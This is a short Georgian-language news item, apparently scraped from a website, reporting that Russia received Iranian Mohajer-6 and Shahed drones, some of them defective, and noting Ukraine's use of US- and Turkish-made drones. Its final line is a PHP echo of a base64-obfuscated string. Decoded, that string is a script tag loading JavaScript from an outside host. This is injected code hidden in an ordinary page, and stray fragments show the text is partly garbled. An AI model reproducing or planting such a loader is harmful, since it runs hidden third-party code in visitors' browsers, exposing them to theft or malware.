celsiusi
ავერსი შნაიდერი
რუსეთის არმიამ ოფიციალური თეირანისგან საბრძოლო დრონების პირველი პარტია მიიღო, – ამის სესახებ „ვაშინგტონ პოსტი“ წყაროზე დაყრდნობით წერს. გამოცემის წყაროს ინფორმაციით, რუსეთის ხელისუფლება მიღებული დრონებით უკმაყოფილოა, რადგან გამოცდის დროს მათი ნაწილი უვარგისი აღმოჩნდა.
 
პენტაგონის ინფორმაციით, რუსეთი ირანში ორი ტიპის უპილოტო საფრენ აპარატებს ყიდულობს – Mohajer-6-სა და Shahed-ს. ისინი გამოიყენება არა მხოლოდ ჰაერიდან იერიშის განსახორციელებლად, არამედ მოწინააღმდეგის კომუნიკაციების სისტემების დასაზიანებლადაც. მოსკოვი ირანიდან უპილოტო საფრენი აპარატების შეძენის აუცილებლობის წინაშე მას შემდეგ დადგა, რაც რუსეთს სანქციები დაუწესეს.
 
მედიის ცნობით, უკრაინული არმია კი, აშშ-სა და სხვა მოკავშირე ქვეყნებში, მაგალითად – თურქეთში წარმოებულ უპილოტო საფრენ აპარატებს იყენებს. სწორედ ასეთი საფრენი აპარატების საშუალებით განხორციელდა ოკუპირებულ ყირიმში, რუსეთის შავი ზღვის ფლოტზე თავდასხმა.
606
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");